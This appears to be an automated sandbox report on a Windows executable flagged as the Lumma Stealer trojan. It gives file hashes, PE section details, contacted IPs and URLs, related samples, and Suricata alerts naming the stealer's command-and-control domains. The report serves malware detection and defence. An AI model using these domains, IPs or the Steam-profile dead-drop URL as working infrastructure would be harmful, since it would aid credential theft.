              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://store.steampowered.com/about/file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000000.00000003.2078102715.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078005900.000000000122D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078071760.0000000001227000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078215009.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078167697.0000000001233000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078040839.0000000001222000.00000004.00000020.00020000.00000000.sdmptrue
              • URL Reputation: malware
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.21.53.8
              		sergei-esenin.comUnited States
              		13335CLOUDFLARENETUStrue
              104.102.49.254
              		steamcommunity.comUnited States
              		16625AKAMAI-ASUStrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1532431
              Start date and time:2024-10-13 06:53:14 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 36s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:file.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@2/5@10/2
              EGA Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.42.65.92
              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target file.exe, PID 7140 because there are no executed function
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              00:54:05API Interceptor3x Sleep call for process: file.exe modified
              00:54:24API Interceptor1x Sleep call for process: WerFault.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.21.53.8file.exeGet hashmaliciousLummaCBrowse
                file.exeGet hashmaliciousLummaCBrowse
                  Setup-Premium.exeGet hashmaliciousLummaCBrowse
                    Solara.exeGet hashmaliciousLummaCBrowse
                      file.exeGet hashmaliciousLummaCBrowse
                        file.exeGet hashmaliciousLummaCBrowse
                          file.exeGet hashmaliciousLummaCBrowse
                            file.exeGet hashmaliciousLummaCBrowse
                              file.exeGet hashmaliciousLummaCBrowse
                                NDJBSLalTk.exeGet hashmaliciousLummaCBrowse
                                  104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                  • www.valvesoftware.com/legal.htm

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  sergei-esenin.comWxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  Solara.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  steamcommunity.comC5u5BZq8gj.exeGet hashmaliciousVidarBrowse
                                  • 104.102.49.254
                                  WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  hD2EOjfpfW.exeGet hashmaliciousVidarBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  Solara.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUSWxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  SecuriteInfo.com.FileRepPup.24407.3577.exeGet hashmaliciousUnknownBrowse
                                  • 172.64.41.3
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  SecuriteInfo.com.FileRepPup.24407.3577.exeGet hashmaliciousUnknownBrowse
                                  • 172.64.41.3
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                  • 104.21.76.57
                                  cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                  • 104.21.76.57
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 172.67.206.204
                                  OceanicTools.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                  • 104.26.13.205
                                  AKAMAI-ASUSC5u5BZq8gj.exeGet hashmaliciousVidarBrowse
                                  • 104.102.49.254
                                  WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  hD2EOjfpfW.exeGet hashmaliciousVidarBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254
                                  Solara.exeGet hashmaliciousLummaCBrowse
                                  • 104.102.49.254

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  a0e9f5d64349fb13191bc781f81f42e1WxmEM5HgjY.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  Setup.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  Solara.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 104.21.53.8
                                  • 104.102.49.254

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2f26e4b65edfc9809a16d7533fcfcfa7c28d99cc_852b229c_d8e4eb8d-192d-4a27-acb5-a0d10fcca4b1\Report.wer

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):1.0363196584133112
                                  Encrypted:false
                                  SSDEEP:192:hyZYivg7tPlktS0BU/7E3juFJRfRazuiFE4Z24IO8ThB:iMtN6ZBU/AjKRpazuiFBY4IO8r
                                  MD5:50B782B1A2E758AD6A93DC856E5ACA34
                                  SHA1:1997A645773A92A715F8194EEC728907029C1D92
                                  SHA-256:300FF6E169F39B9C78DAC65C3E89B0E816BDED85A942F83184611C5F530FEE83
                                  SHA-512:2880385F5285A2572C34F89D9A544A413164CC510B8ECD32E3A15B94536022136675CF30C62298FF7B23230446DF5FF9383B65B6BDAC07A9B5AA0602A9E644EC
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.6.8.8.5.0.1.2.4.0.7.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.6.8.8.5.0.6.8.6.5.7.3.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.e.4.e.b.8.d.-.1.9.2.d.-.4.a.2.7.-.a.c.b.5.-.a.0.d.1.0.f.c.c.a.4.b.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.a.f.a.4.0.f.-.c.2.6.7.-.4.2.f.d.-.8.1.8.0.-.e.4.2.6.c.9.a.7.5.0.0.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.e.4.-.0.0.0.1.-.0.0.1.4.-.f.f.b.3.-.f.0.e.d.2.b.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.2.1.b.a.5.5.d.1.7.5.8.a.e.c.f.6.a.8.d.5.4.e.3.5.5.0.a.1.c.f.4.c.2.7.6.4.c.2.5.5.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB4C.tmp.dmp

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 04:54:10 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):284434
                                  Entropy (8bit):1.5020274599815684
                                  Encrypted:false
                                  SSDEEP:768:dUJZZABphVK/BmXxYejSymOnBN+0lVXvzB6A1zKUaAlYLRzY0Ho:+TuK/oBOO+Kv96AsUanF7I
                                  MD5:5199E5EB628B9ACFBD86D44FB2D6BCC3
                                  SHA1:A9E8A7D861E54F4EBE6C2D02B0F11224B778E717
                                  SHA-256:67E94788F21E9EDA65525C6B0B61288136F744F2983F3D28EC6A29FAB93CFED6
                                  SHA-512:968A1E4A3ABBA0EECA979D310A480FF6B952F10770251782CD06A8E254D4FA10D5321D7C7840A75536C29B44FC74C00D0FD715503AB26CD5D2D711F50CDF951B
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP..a..... .......rR.g........................T................&......d...............`.......8...........T............J..z............'...........)..............................................................................eJ......L*......GenuineIntel............T...........mR.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC67.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8298
                                  Entropy (8bit):3.6962348086411083
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJmCf6W/1Nq6YEIGJSUoCngmfBGe/pry89bBssfYvLm:R6lXJ96W/1Nq6YEfJSUoCngmfZpB/fh
                                  MD5:94A590EFABEAA7754757ECEA36FC117C
                                  SHA1:F3E009BF2C9ADC10774B4ADD5BBAB5F458A8251F
                                  SHA-256:908FC6F54F336550F326A4DF1D3B3BB421843BC633E2EA3B0A8A0CDA0B8E6CF6
                                  SHA-512:E949502F68DAD59619749746BC64DC16CA2205850041D953591EA700EE7CA7E71FFF2D84F702D28C76948EFD02AABB0380A44EB8D8308B0F4DA7E80D9F46A342
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.0.<./.P.i.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCB6.tmp.xml

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4542
                                  Entropy (8bit):4.425835017715291
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsOJg77aI9bIWpW8VYGlYm8M4JjlFi+q8Czrow4d:uIjfEI71h7VjUJGjrow4d
                                  MD5:D823EDA9F365914C64F8E060FC2F0EC2
                                  SHA1:E28229DAC7881EB335CF3711B47504415F6FBA03
                                  SHA-256:A36DDC7399A470E2D886DF52AAAB23109255698334B3AA64313C20A76D446F78
                                  SHA-512:90377814066DD8E2E2F780CDD404A0D0365B527AE88E4A5B6038255F469ED691C6B93F686C690465587D8432F3F9461460AF192D0FD7E04BB3CC0A395260874A
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="541196" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                  C:\Windows\appcompat\Programs\Amcache.hve

                                  Download File
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421344990139069
                                  Encrypted:false
                                  SSDEEP:6144:YSvfpi6ceLP/9skLmb0OTVWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:jvloTVW+EZMM6DFy403w
                                  MD5:3BB1E45FB563338A784117D093CE35F4
                                  SHA1:5C7815F36A4A98C1C1D95FA180190ED134A826FD
                                  SHA-256:9B34AE80D28CD7F4EBA1ABF995632D6DA3A23F6FE7B044A12631B47460848DEA
                                  SHA-512:531B5509AEE2381861C92DBAC94908D3086B960F0BFE655E316086F62C4BA99B98DEC36634984E9D36D3AE98C58713E871431D3D5A74083014887A6616E36F53
                                  Malicious:false
                                  Reputation:low
                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:T..+...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.947312085711275
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'808'384 bytes
                                  MD5:34124e70e2508de56d89b57345b39f65
                                  SHA1:21ba55d1758aecf6a8d54e3550a1cf4c2764c255
                                  SHA256:582e159bf52a2543356aaa21d4e0b6d12c831e53640bb2a92528d6b76a759a37
                                  SHA512:a1d8b984fe5193fcdb7e374fe27760549d8e17f26a9c3887b40a16d13cb90e8e7c329979c7e0225aae14977e3ab5d3f5c62c2226b7a45e1e5147274e95cb78a7
                                  SSDEEP:24576:GZ2XfQrE+ZumSUPtkFP9gi9VD28t3NCs/FoJmS0lrkemfawQtWsNG5Nwuv7oEaYQ:GZI56PtkFmcAKqJ2lNmCwQtWd5eu8Ea
                                  TLSH:528533C3E93BD199E5AA8B3255B5FC794B14D7ED0179DEE52D2262E10C4CFCA13422B0
                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................pH...........@...........................H...........@.................................W...k..

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x887000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007FDDACC6436Ah
                                  pcmpeqd mm3, qword ptr [ebx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x5d0000x25e00a8bc5590e13808a05256d5d8a8f69f1cFalse0.9995616749174917data7.986794328834298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x600000x2960000x200b662879c753c07ad1a9d62b76ecf57e3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  xuggjiye0x2f60000x1900000x18fe00239e3c15a1a442666bdbaa15de796461False0.9939983686308221data7.95408344029227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  eirrygcb0x4860000x10000x6001ea5e59a16de13eafcd8d29387ac3a49False0.6022135416666666data5.224357358428615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x4870000x30000x22009bfa2b38d5f414ccfacba0cb16543deeFalse0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-13T06:54:07.200212+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.5606101.1.1.153UDP
                                  2024-10-13T06:54:07.212395+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.5580721.1.1.153UDP
                                  2024-10-13T06:54:07.227366+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.5610731.1.1.153UDP
                                  2024-10-13T06:54:07.238202+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.5563351.1.1.153UDP
                                  2024-10-13T06:54:07.249676+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.5650111.1.1.153UDP
                                  2024-10-13T06:54:07.260005+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.5549891.1.1.153UDP
                                  2024-10-13T06:54:07.269827+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.5525791.1.1.153UDP
